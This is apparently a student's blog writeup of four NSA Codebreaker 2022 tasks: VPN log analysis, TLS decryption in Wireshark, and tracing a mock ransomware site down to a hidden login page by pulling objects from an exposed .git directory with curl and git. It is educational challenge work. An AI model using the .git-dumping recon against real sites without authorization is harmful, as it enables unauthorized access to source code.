🔥NSA Codebreaker 2022 Writeup

Tasks Completed: 4/9

Leaderboard

UNG got 6th Place, not too bad :)

This was also a bonus challenge/extra credit opportunity for my CYBR 3800 Linux Operating Systems course!

Challenge

This year's challenge was to solve a ransomware attack, and our mission was to investigate the attack , discover the tools and techniques used, unravel and expose a ransomware as a service ring, and recover the critical files to save the day.

TASK A1: Initial Access

Category: Log Analysis

Prompt

  • Enter the username which shows signs of a possible compromise.

Downloads

  • Access log from the company’s VPN server for the week in question.

    (vpn.log)

VPN.log file analysis with awk, grep, and sort

I first I downloaded the vpn.log file and cat the contents, but it is kind of

difficult to read for analysis.

vpn.log

So, I used awk and sort to get things in a more readable format for analysis, this way we can see all users in alphabetical order and see how many times they logged in.

using awk and sort on vpn.log, users in Alphabetical order

I also wanted to know who had failed login attempts, indicated by “invalidCredentials”.'

users with failed login attempts

After a few failed submissions, I decided to exclude the users with failed login attempts and focus on ones that had successful login attempts because the phishing campaign was a successful one, meaning minimal login attempts, probably 1-2. So I greped each user and analyzed them one by one. I had two incorrect submissions before I came across one that was successful because of the two simultaneous sessions from different IP addresses, indicating that someone else logged in at the same time from a different IP.

User with 2 simultaneous sessions from different IP addresses
Task A1 Completed!

TASK A2: Identifying the Attacker

Category: Computer Forensics, Packet Analysis

Prompt

  • What was the username of the account of the attacker used when they built their tools?

Downloads

  • Files captured from root’s home directory on the staging server (root.tar.bz2)

  • PCAP file believed to be of the attacker downloading their tools (session.pcap)

Cert.pem RSA Private Key

I first downloaded the root.tar.bz2 and session.pcap file to my Downloads folder:

  • I extracted the root.tar.bz2 folder and saved the files to my machine

  • Here we find a .cert.pem file that looks interesting and useful to use in the session.pcap file in wireshark

  • I moved it to the Desktop and renamed it “cert.pem” so that it's visible

extracting and moving files
.cert.pem

Opening the .cert.pem file with nano and we see that it is a RSA private key, maybe this will be useful to decrypt some TLS traffic using Wireshark. For some reason the .cert.pem file was not visible on the desktop but when i renamed it to “cert.pem”, it was visible on the desktop.

Session.pcap: Decrypting TLS Traffic with Cert.pem RSA Private Keys

I then opened Wireshark and opened the session.pcap file. It looks like there is some encrypted TLS traffic. To decrypt the TLS traffic in the packet capture file we must, given what we have, we must use the cert.pem file that contains RSA private keys by going to (Edit > Preferences > Protocols > TLS > RSA Key List) and use the cert.pem file, TLS protocol, port 443, and 172.16.01 as the ip address(ip for whose TLS traffic we want to decrypt in the pcap file).

Decrypting TLS traffic with cert.pem

We now see an interesting packet using the HTTP protocol using the GET /tools.tar method request, because it’s now decrypted using cert.pem the TLS stream should reveal some information regarding the client and server request/response and how the attacker was able to download their tools.

Interesting HTTP clear text packet "GET /tools.tar"

Right clicking on the packet and (Follow Stream > TLS Stream), we now see the username the attacker used “HuskyWisePitch” when building/downloading their tools.

Follow Steam > TLS Stream reveals the attackers username, HuskyWisePitch
Task A2 Completed!

TASK B1: Information Gathering

Category: Reverse Engineering, Web Analysis

Prompt

  • Enter the domain name of the associated site

Downloads

  • Demand note from the attacker ( YOUR_FILES_ARE_SAFE.txt)

YOUR_FILES_ARE_SAFE.txt demand/ransom note

So for this task we have a demand/ransom note from the attacker and it looks like our files are encrypted and we must go to this page to find out how to recover them.

YOUR_FILES_ARE_SAFE.txt demand
https://wsntbwxbyfgfyaxv.unlockmyfiles.biz/

Inspect > Dev Tools > Network > HTTP GET Request Headers > Profit $$$

From here we can inspect the site using the inspect/dev tools in our browser. In the network tab we see an interesting GET request with the Host header leading to an external site “https://uxlnsbzrtpoawmpd.ransommethis.net/”.

external site connected to this site found in GET request Host header

We go to this site and inspected it as well, it looks like the contents are forbidden, but this is in fact the connection to the demand/ransom site , “https://uxlnsbzrtpoawmpd.ransommethis.net/”.

external site associated with the first site
Task B1 Completed!

TASK B2: Getting Deeper

Category: Reverse Engineering, Web Analysis

Prompt

"It looks like the backend site you discovered has some security features to prevent you from snooping. They must have hidden the login page away somewhere hard to guess. Analyze the backend site, and find the URL to the login page."

  • Enter the URL for the login page. (for the external site found in Task B1)

Exposed x-git-commit-hash

For this task we are looking for the login page, so let's inspect this site with dev tools and see what we can find by analyzing the “backend” of the site. We see a server response header of “x-git-commit-hash" with a value of “a810d8632d5578670690618f391c4ea6a6d0c14a”, maybe there is a hidden “/.git” directory ?

Exposed x-git-commit hash

So, i tried "https://uxlnsbzrtpoawmpd.ransommethis.net/.git/", it looks like directory listing is disabled.

Directory listing disabled at /.git

After some research, the site exposes a x-git-commit-hash value that is that is often used for GitHub whenever a commit is made to a repository (which holds files for developers). I learned a few basic git commands like init, add, clone, commit, push, pull, and theory of how git works. In this case all i needed was a working git repo and access to git commands for this to work. So I used an existing git repo of mine (note: you can also create your own test repo) that was a private repo with my Pen-Testing notes.

But the directory we really want to go to is the .git directory to mess around with the internals of how git works, where we see common things like HEAD, config, and objects.

.git directory, all git repos have this

For the next part we can get pieces of information by either going to the directory itself in our browser or by downloading the files using curl. I decided to go with curl to download the files for content discovery. I did this in a separate directory to keep my repo and this information separate.

Using Curl and git to extract objects from the backend site

As we can see below, we got the same x-git-commit-hash value when going to the .git/refs/heads/main directory, but we can’t really read that object unless we use a special git command(git cat-file -p).

This is how the process goes:

  • Create a directory to store these objects using “mkdir .git/objects/a8” , a8 being the beginning of our x-git-commit-hash.

  • Use curl to download the output of the hash and store it in the directory we created using --output to specify where to save the it to

  • Use “git cat-file –p a810d8632d5578670690618f391c4ea6a6d0c14a” to read the contents of the file

Reading git objects using curl and git cat-file

Here we notice another object of “tree 3db88461db61f52d71247e0e320387862b560318” along with the author and other information. To gain some more info about that object, we can repeat the process:

  • "mkdir .git/objects/3d" 3d being the first two digits of the object

  • Curl the contents of that object and store it into the directory we created in step one

  • git cat-file –p <completehash>

    • use this command to print its contents

Following this process, I was able to find some interesting objects, the app object could possibly contain backend files about the web application.

3db88461db61f52d71247e0e320387862b560318

Following the same process using "bc7c79ab860bd5b09663d08ffcc7e87c074059b5", i was able find Server.py which contained interesting information about how the backend of the web application works.

bc7c79ab860bd5b09663d08ffcc7e87c074059b5

We opened the server.py file and it looks like there’s some info that could have exposed where the login page is located in the expected_pathkey() function.

server.py

Let’s see what happens if we go to that path on the “unauthoriized” site.

https://uxlnsbzrtpoawmpd.ransommethis.net/aonvykyjbhdoeruk/login

BOOM ! WE FOUND THE LOGIN PAGE

Note, this could have been much easier with this tool

Task B2 Completed!

The End

This was my first ever NSA Codebreaker challenge 🙌. I am glad that i was able to complete a few tasks and that i was able to explore and learn new things like using awk, sort, and grep to analyze a log file, decrypting TLS traffic in Wireshark, web application analysis, and git!

Last updated